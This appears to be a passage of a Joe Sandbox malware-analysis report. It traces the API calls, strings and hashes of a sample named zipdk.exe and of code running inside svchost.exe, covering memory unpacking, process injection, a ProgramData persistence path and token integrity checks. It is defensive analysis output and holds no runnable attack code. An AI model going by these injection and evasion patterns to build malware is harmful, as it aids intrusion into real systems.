Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: aab5b47fb1010979d6703f975dc37e477ad9a8adbce8aa8f139d8b65e0b46d75
Instruction ID: 36972b0467edafbaf1779f66cb31f899a5dd80d59ef785065de926f4778802a0
Opcode Fuzzy Hash: aab5b47fb1010979d6703f975dc37e477ad9a8adbce8aa8f139d8b65e0b46d75
Instruction Fuzzy Hash: DF112471D00209ABDF009FE99849BDFFBBCAF4D714F504566E509A7200D7759A548BB0

Uniqueness

Uniqueness Score: -1.00%

Function 027E1F56 Relevance: 5.0, APIs: 4, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 027E1CD5: GetProcessHeap.KERNEL32(00000008,-0000007F,00000001), ref: 027E1CFD
Part of subcall function 027E1CD5: RtlAllocateHeap.NTDLL(00000000), ref: 027E1D04
Part of subcall function 027E1CD5: lstrcpy.KERNEL32(00000000,00000000), ref: 027E1D2D
Part of subcall function 027E1CD5: GetProcessHeap.KERNEL32(00000000,?), ref: 027E1DF6
Part of subcall function 027E1CD5: HeapFree.KERNEL32(00000000), ref: 027E1DFD
Part of subcall function 027E1CD5: Sleep.KERNEL32(00001388), ref: 027E1E08

GetProcessHeap.KERNEL32(00000000,?), ref: 027E1FB4
HeapFree.KERNEL32(00000000), ref: 027E1FBB
GetProcessHeap.KERNEL32(00000000,?), ref: 027E1FC3
HeapFree.KERNEL32(00000000), ref: 027E1FCA

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocateSleeplstrcpy
String ID:
API String ID: 1268735806-0
Opcode ID: a7db2b9eec46c203b6237071dd5175dbc300bbcdb4c9548182525c1e3e8513b1
Instruction ID: 0c3421de30788b4ddecf68dab54a6739c52a4e2250bc3ed2f6d3d5098ce0ea22
Opcode Fuzzy Hash: a7db2b9eec46c203b6237071dd5175dbc300bbcdb4c9548182525c1e3e8513b1
Instruction Fuzzy Hash: 1301D7B1808345DFCB10DFA6D848A5BBBE8AB8D214F40891EF59992200E735E6149FA6

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: zipdk.exePID: 1076, Parent PID: 1088COMMON

Execution Graph

Execution Coverage:	7.6%
Dynamic/Decrypted Code Coverage:	71.2%
Signature Coverage:	0%
Total number of Nodes:	208
Total number of Limit Nodes:	12

Executed Functions

Function 004010CF Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 75
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OutputDebugStringA.KERNEL32(fail 3), ref: 004010EE
NtCreateUserProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00401122
OutputDebugStringA.KERNEL32(fail 2), ref: 00401133

Strings

fail 2, xrefs: 0040112E
Start, xrefs: 00401167
Stop Err, xrefs: 00401187
fail 3, xrefs: 004010E9
Stop ok, xrefs: 00401180
fail 1, xrefs: 0040114E

Memory Dump Source

Source File: 00000010.00000002.1724669146.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.1724653635.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000010.00000002.1724686543.0000000000402000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000010.00000002.1724701434.0000000000403000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000010.00000002.1724805781.0000000000404000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_zipdk.jbxd

Yara matches

Similarity

API ID: DebugOutputString$CreateProcessUser
String ID: Start$Stop Err$Stop ok$fail 1$fail 2$fail 3
API String ID: 976970837-1310772363
Opcode ID: f498b5b8b7e85bdb1976bf98945623132273431d24ab6f40ffb868399b8cd4d0
Instruction ID: 243eedd8a4f49eb320fdfb0d7e1e77221009fbf540129bad84db16ccdf4411bb
Opcode Fuzzy Hash: f498b5b8b7e85bdb1976bf98945623132273431d24ab6f40ffb868399b8cd4d0
Instruction Fuzzy Hash: 1421CA32605209BBCB055F94DD01E9A3F29EB0C725B214237FE00B61F4DA7AC960AB99

Uniqueness

Uniqueness Score: -1.00%

Function 020904F4 Relevance: 13.8, APIs: 9, Instructions: 331
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00000992,00003000,00000040,00000992,02090000), ref: 020905D8
VirtualAlloc.KERNELBASE(00000000,000001A9,00003000,00000040,0209003A), ref: 0209060F
VirtualAlloc.KERNELBASE(00000000,0000B2A2,00003000,00000040), ref: 0209066F
VirtualFree.KERNELBASE(020B0000,00000000,00008000), ref: 020906A5
VirtualProtect.KERNELBASE(00400000,00009000,00000004,020904CF), ref: 020907B4
VirtualProtect.KERNEL32(00400000,00001000,00000004,020904CF), ref: 020907DB

Part of subcall function 020903A1: LoadLibraryExA.KERNELBASE(?,00000000,00000000,?), ref: 020903DA

VirtualProtect.KERNELBASE(00400000,?,00000002,020904CF), ref: 020908A1
VirtualProtect.KERNELBASE(00400000,?,00000002,020904CF,?), ref: 020908F7
VirtualFree.KERNELBASE(020B0000,00000000,00008000), ref: 0209091B

Memory Dump Source

Source File: 00000010.00000002.1725310722.0000000002090000.00000040.00001000.00020000.00000000.sdmp, Offset: 02090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2090000_zipdk.jbxd

Similarity

API ID: Virtual$Protect$Alloc$Free$LibraryLoad
String ID:
API String ID: 1732388798-0
Opcode ID: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction ID: 31a9f0b52f93f73356efc9674a42cce369bc873aea5879f07b60c7ae1f66a93b
Opcode Fuzzy Hash: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction Fuzzy Hash: 33D17D727002019FEF11EF54CC80F5277A6FF64714B890294ED0E9F66ADB70A921EB68

Uniqueness

Uniqueness Score: -1.00%

Function 00422152 Relevance: 13.8, APIs: 9, Instructions: 331
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00000992,00003000,00000040,00000992,00421C5E), ref: 00422236
VirtualAlloc.KERNEL32(00000000,000001A9,00003000,00000040,00421C98), ref: 0042226D
VirtualAlloc.KERNEL32(00000000,0000B2A2,00003000,00000040), ref: 004222CD
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00422303
VirtualProtect.KERNEL32(00400000,00000000,00000004,0042212D), ref: 00422412
VirtualProtect.KERNEL32(00400000,00001000,00000004,0042212D), ref: 00422439
VirtualProtect.KERNEL32(00000000,?,00000002,0042212D), ref: 004224FF
VirtualProtect.KERNEL32(00000000,?,00000002,0042212D,?), ref: 00422555
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00422579

Memory Dump Source

Source File: 00000010.00000002.1725079619.0000000000421000.00000040.00000001.01000000.00000007.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_421000_zipdk.jbxd

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction ID: 825025660836190913fdd1bb514e6233e9fadebdfec7ebde24a9587a44909d83
Opcode Fuzzy Hash: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction Fuzzy Hash: 2FD19E72700100AFEB14EF54CD80F6277A6FF68310B890295ED0D9F26ADB74A921CB6C

Uniqueness

Uniqueness Score: -1.00%

Function 004015BE Relevance: 1.5, APIs: 1, Instructions: 20
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00000000,00000000,00000000,75539350,00003000,00000004), ref: 004015DB

Memory Dump Source

Source File: 00000010.00000002.1724669146.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.1724653635.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000010.00000002.1724686543.0000000000402000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000010.00000002.1724701434.0000000000403000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000010.00000002.1724805781.0000000000404000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_zipdk.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: c89adba908ca871be9ce827485f4956cce24457d38a3e40d239f8f1f7eb3a445
Instruction ID: 5f65e376ed05142d156b79c11863de9d8c1410112659dc892d0819c29325736b
Opcode Fuzzy Hash: c89adba908ca871be9ce827485f4956cce24457d38a3e40d239f8f1f7eb3a445
Instruction Fuzzy Hash: 71E0EC7556020CBBEF01CF90DD46FE977BCEB00715F104150B904D6090D775AB149B95

Uniqueness

Uniqueness Score: -1.00%

Function 0040160F Relevance: 1.5, APIs: 1, Instructions: 16
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtWriteVirtualMemory.NTDLL(00401692,00000000,00000000,?,?), ref: 00401623

Memory Dump Source

Source File: 00000010.00000002.1724669146.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.1724653635.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000010.00000002.1724686543.0000000000402000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000010.00000002.1724701434.0000000000403000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000010.00000002.1724805781.0000000000404000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_zipdk.jbxd

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: dd962de9b64438870b2894e6f6e0c6ee5c7c009fcec118a3b940f06222a4811c
Instruction ID: 5a808b04aabe2117a938e4500ca1c1b9b1ef177e0b005ac0e652288855810eb1
Opcode Fuzzy Hash: dd962de9b64438870b2894e6f6e0c6ee5c7c009fcec118a3b940f06222a4811c
Instruction Fuzzy Hash: 78D0C93255410DBFCF029FA4DD05CAA7B6EFB09211B004665FE29D2060D6329A34AB91

Uniqueness

Uniqueness Score: -1.00%

Function 004015EE Relevance: 1.5, APIs: 1, Instructions: 15
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(00000044,?,00000010,?,004010CF), ref: 00401602

Memory Dump Source

Source File: 00000010.00000002.1724669146.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.1724653635.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000010.00000002.1724686543.0000000000402000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000010.00000002.1724701434.0000000000403000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000010.00000002.1724805781.0000000000404000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_zipdk.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 4da293ee12ca45bf45e600fb64d5736a10573e54717f0195352ef75157bb5ffd
Instruction ID: 2a43cff2ce15a73ccafebcd56fae5865f2d1f9501d48921ddcbb68ebc334f4a9
Opcode Fuzzy Hash: 4da293ee12ca45bf45e600fb64d5736a10573e54717f0195352ef75157bb5ffd
Instruction Fuzzy Hash: C1D0C93205410EBFDF019FA0DD05CEA3B6DEB05255B004121FA19D1060E632D6699B90

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 70
sleepprocessstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineA.KERNEL32 ref: 0040100A
StrStrIA.KERNELBASE(00000000, /u), ref: 00401018
Sleep.KERNEL32(00001388), ref: 00401027
ExitProcess.KERNEL32 ref: 00401039
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040107F
SetCurrentDirectoryW.KERNEL32(?), ref: 0040108C
lstrcatW.KERNEL32(?,?), ref: 004010A7
CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004010C3

Strings

/u, xrefs: 00401012

Memory Dump Source

Source File: 00000010.00000002.1724669146.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.1724653635.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000010.00000002.1724686543.0000000000402000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000010.00000002.1724701434.0000000000403000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000010.00000002.1724805781.0000000000404000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_zipdk.jbxd

Yara matches

Similarity

API ID: DirectoryProcess$CommandCreateCurrentExitLineSleepSystemlstrcat
String ID: /u
API String ID: 4042104365-4118749740
Opcode ID: b747ae3141204b1c38ca21bc4f55e1c812c318ab8368f1fa781a2d1dd495982a
Instruction ID: 96ee623e9da2e0af38eded0e061056f2ac1dfe5269435d034bd7705fbe78fb85
Opcode Fuzzy Hash: b747ae3141204b1c38ca21bc4f55e1c812c318ab8368f1fa781a2d1dd495982a
Instruction Fuzzy Hash: 36115472802619ABDB20AFB1DD0DEDE7B7CAF08705F10003AF605F20A5D63897458BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401CB5 Relevance: 3.0, APIs: 2, Instructions: 8
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,00000000,0040157D,00000000,00000000,00000000,?,530C1AEE,004020E8), ref: 00401CC2
RtlFreeHeap.NTDLL(00000000,?,530C1AEE,004020E8), ref: 00401CC9

Memory Dump Source

Source File: 00000010.00000002.1724669146.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.1724653635.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000010.00000002.1724686543.0000000000402000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000010.00000002.1724701434.0000000000403000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000010.00000002.1724805781.0000000000404000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_zipdk.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: a17b4e92315cbfe38b156d6706c7fcabeb76f83999710892967727563ebf0b78
Instruction ID: de2e74cc2c5d9c26438789ecc4f5efd00e9e3bcaa0604652a6375203050d3e1d
Opcode Fuzzy Hash: a17b4e92315cbfe38b156d6706c7fcabeb76f83999710892967727563ebf0b78
Instruction Fuzzy Hash: E3C04C31449240FBEF015F909B0CB0A7ABDAB84743F008468F149A11A486748944DB15

Uniqueness

Uniqueness Score: -1.00%

Function 00401C79 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,?,00401D53,00001000,00000000,00000000,?,00401467,00000000,?,?,?,?,00401295), ref: 00401C7F
RtlAllocateHeap.NTDLL(00000000,?,00401467,00000000,?,?,?,?,00401295), ref: 00401C86

Memory Dump Source

Source File: 00000010.00000002.1724669146.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.1724653635.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000010.00000002.1724686543.0000000000402000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000010.00000002.1724701434.0000000000403000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000010.00000002.1724805781.0000000000404000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_zipdk.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: af29794abdbade58b16b445bdb6112b6466faf214ccefe91d731fee372fe0b5d
Instruction ID: bbb82e670732032ebf8e303bc8a39f8b906a07d9cff939e05880545c35f94fa9
Opcode Fuzzy Hash: af29794abdbade58b16b445bdb6112b6466faf214ccefe91d731fee372fe0b5d
Instruction Fuzzy Hash: 9EB00275546240EBDE416FE59F0DA097E7DBB84743F008454B349E5064CA758514DB25

Uniqueness

Uniqueness Score: -1.00%

Function 020903A1 Relevance: 1.6, APIs: 1, Instructions: 56
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExA.KERNELBASE(?,00000000,00000000,?), ref: 020903DA

Memory Dump Source

Source File: 00000010.00000002.1725310722.0000000002090000.00000040.00001000.00020000.00000000.sdmp, Offset: 02090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2090000_zipdk.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c1a17069605dab7d48ac39e7c644e9b5868b307e3d54936d315e395ad9e50ff5
Instruction ID: 1a6bd088b16c8deb3158d0d80a94354464e9a5466748cb6a7d1f65d87d3b6f21
Opcode Fuzzy Hash: c1a17069605dab7d48ac39e7c644e9b5868b307e3d54936d315e395ad9e50ff5
Instruction Fuzzy Hash: 7D01D8B3A043156BFF218A19DC80B6A73AEEFC5724F19C525FD07E7240C674D841B5A0

Uniqueness

Uniqueness Score: -1.00%

Function 00401593 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,00401442,00401295), ref: 004015AA

Memory Dump Source

Source File: 00000010.00000002.1724669146.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.1724653635.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000010.00000002.1724686543.0000000000402000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000010.00000002.1724701434.0000000000403000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000010.00000002.1724805781.0000000000404000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_zipdk.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: d38c51f324250414f169d42e986cd6cb3458d82db6cc8dc1e70cf848005a2c4a
Instruction ID: 98ea57f8acb340bf8185d7c41957bfe50ebb8c53553d8a1b8998a7004bdb3259
Opcode Fuzzy Hash: d38c51f324250414f169d42e986cd6cb3458d82db6cc8dc1e70cf848005a2c4a
Instruction Fuzzy Hash: 47D05E33C0830C5ACB04EBF19A0E8CD77FC9B0C214F1004A6E505B2080FA76EA5883A8

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00401264 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(00000000, /p=,00401033,00000000), ref: 0040126D
StrToIntA.SHLWAPI(-00000004), ref: 0040127B
GetModuleFileNameW.KERNEL32(00000000,C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe,00000104), ref: 004012A1

Strings

C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe, xrefs: 0040129A
/p=, xrefs: 00401264

Memory Dump Source

Source File: 00000010.00000002.1724669146.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.1724653635.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000010.00000002.1724686543.0000000000402000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000010.00000002.1724701434.0000000000403000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000010.00000002.1724805781.0000000000404000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_zipdk.jbxd

Yara matches

Similarity

API ID: FileModuleName
String ID: /p=$C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe
API String ID: 514040917-374769793
Opcode ID: 2d4bb584e25658cc2728f9be044f66e59ae58770c4c6207fcfe1ce4352e57228
Instruction ID: a97e36b21e4f6c4b508bbe1c7bc1ce47f756939332ff9af57f8a63180c09d7ad
Opcode Fuzzy Hash: 2d4bb584e25658cc2728f9be044f66e59ae58770c4c6207fcfe1ce4352e57228
Instruction Fuzzy Hash: EAE048B068130177EA502F719E0FB156A985B08B4FF544476BA45F41F5DAFCC241451D

Uniqueness

Uniqueness Score: -1.00%

Function 004234A8 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 396COMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(00432918,0000015C), ref: 0042358F
__aulldiv.LIBCMT ref: 00423916

Strings

uTB, xrefs: 00423517, 00423545, 0042354B, 0042359B, 00423642, 0042365C, 00423722, 00423842, 00423866, 0042388F, 004238C3, 004238CA, 00423935, 00423961, 00423A0E

Memory Dump Source

Source File: 00000010.00000002.1725079619.0000000000421000.00000040.00000001.01000000.00000007.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_421000_zipdk.jbxd

Similarity

API ID: DirectoryWindows__aulldiv
String ID: uTB
API String ID: 2557273154-3950955333
Opcode ID: d23a282598ad219914c9b2bdc5d99ce2b0672d1c0f91bb2d386cbf8a1c0af863
Instruction ID: ec485fc663059ce4ae46598323261169b09f174663d50ce322c37d4fa9724364
Opcode Fuzzy Hash: d23a282598ad219914c9b2bdc5d99ce2b0672d1c0f91bb2d386cbf8a1c0af863
Instruction Fuzzy Hash: 76E1D2727003229BC718DF38EDA06E537A2EB98719F59813BD800C73E5E678AD45879D

Uniqueness

Uniqueness Score: -1.00%

Function 00401305 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(NTDLL.DLL,?,0040128B), ref: 0040130B
RtlAllocateHeap.NTDLL ref: 00401387

Strings

NTDLL.DLL, xrefs: 00401306

Memory Dump Source

Source File: 00000010.00000002.1724669146.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.1724653635.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000010.00000002.1724686543.0000000000402000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000010.00000002.1724701434.0000000000403000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000010.00000002.1724805781.0000000000404000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_zipdk.jbxd

Yara matches

Similarity

API ID: AllocateHandleHeapModule
String ID: NTDLL.DLL
API String ID: 3205619-1613819793
Opcode ID: 197974c3615feffb27709de3e24c9eccab4d8452ca4107e1a8abdba4d6cf989d
Instruction ID: 661fe251d33bcd873fe0306d0fa480983da9c30ce6244cc3b298440f3ea03910
Opcode Fuzzy Hash: 197974c3615feffb27709de3e24c9eccab4d8452ca4107e1a8abdba4d6cf989d
Instruction Fuzzy Hash: 5E213EA5B9079479E13025761E8EF2759AD85E6F99360817FBB04B21D6D8FC4C04C06C

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: svchost.exePID: 6344, Parent PID: 1076COMMON

Execution Graph

Execution Coverage:	23.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	630
Total number of Limit Nodes:	9

Executed Functions

Function 02EC2BA4 Relevance: 3.1, APIs: 2, Instructions: 58nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000040,?), ref: 02EC2BDA
NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?), ref: 02EC2C23

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: cd4e1c3102462a5b47be6a2044ca1fb5a326001bfb32e76da7e427f9a9326ece
Instruction ID: d7a3f21df64004be9f160309ca1a055ca882d835afab6d465f180689507a0bea
Opcode Fuzzy Hash: cd4e1c3102462a5b47be6a2044ca1fb5a326001bfb32e76da7e427f9a9326ece
Instruction Fuzzy Hash: 7511CD35950105AFCB09CFD8C954DE977B4FF88324F2542BDE9254F291DB31AA46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02EC338D Relevance: 19.7, APIs: 13, Instructions: 156
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?,0000011C), ref: 02EC33BE
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,?), ref: 02EC33E0
GetLastError.KERNEL32 ref: 02EC33E2
GetProcessHeap.KERNEL32(00000008,?), ref: 02EC3401
RtlAllocateHeap.NTDLL(00000000), ref: 02EC3408
GetTokenInformation.KERNELBASE(?,00000002,00000000,?,?), ref: 02EC3428
GetSidIdentifierAuthority.ADVAPI32(?), ref: 02EC3448
GetSidSubAuthorityCount.ADVAPI32(?), ref: 02EC346B
GetSidSubAuthority.ADVAPI32(?,00000000), ref: 02EC3480
GetSidSubAuthority.ADVAPI32(?,?), ref: 02EC3497
FindCloseChangeNotification.KERNELBASE(00000000), ref: 02EC351A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02EC3527
HeapFree.KERNEL32(00000000), ref: 02EC352E

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: AuthorityHeap$ProcessToken$Information$AllocateChangeCloseCountErrorFindFreeIdentifierLastNotificationOpen
String ID:
API String ID: 3355550324-0
Opcode ID: b4d129ea19c175a5b67e4ade284b3e1996f7063dca93bcc540e4fc1aa3598b29
Instruction ID: b927c337c9ea5720496ea018f32ab2d374375b6d91a6ebedd53dde4ff6a8caf9
Opcode Fuzzy Hash: b4d129ea19c175a5b67e4ade284b3e1996f7063dca93bcc540e4fc1aa3598b29
Instruction Fuzzy Hash: A551E0315C42019FD3228FA9C909BAABBA8FF46319F28D99CF494C3251C731D586CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02EC3555 Relevance: 15.1, APIs: 10, Instructions: 76
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 02EC3570
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 02EC3585
GetLastError.KERNEL32 ref: 02EC358B
GetProcessHeap.KERNEL32(00000008,00000001), ref: 02EC35A1
RtlAllocateHeap.NTDLL(00000000), ref: 02EC35A8
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 02EC35C1
GetSidSubAuthority.ADVAPI32(00000000,00000000), ref: 02EC35CF
FindCloseChangeNotification.KERNELBASE(00000000), ref: 02EC35F0
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02EC35FD
HeapFree.KERNEL32(00000000), ref: 02EC3604

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$ProcessToken$Information$AllocateAuthorityChangeCloseErrorFindFreeLastNotificationOpen
String ID:
API String ID: 1063018014-0
Opcode ID: 293f633f36b3cac022c18c42321b4c0af70ba8daaab026e6613168de1ab58886
Instruction ID: 9612a877caa4c541b332b94dc6c10b62d514991ca528031a94e232f18e7192cf
Opcode Fuzzy Hash: 293f633f36b3cac022c18c42321b4c0af70ba8daaab026e6613168de1ab58886
Instruction Fuzzy Hash: 412180319C0204FFEB214BD6CD0ABAEBB3CFB41769F6484A9F501D2190C7358992DB60

Uniqueness

Uniqueness Score: -1.00%

Function 02EC2DAF Relevance: 12.1, APIs: 8, Instructions: 72
fileCOMMON

Download Yara Rule

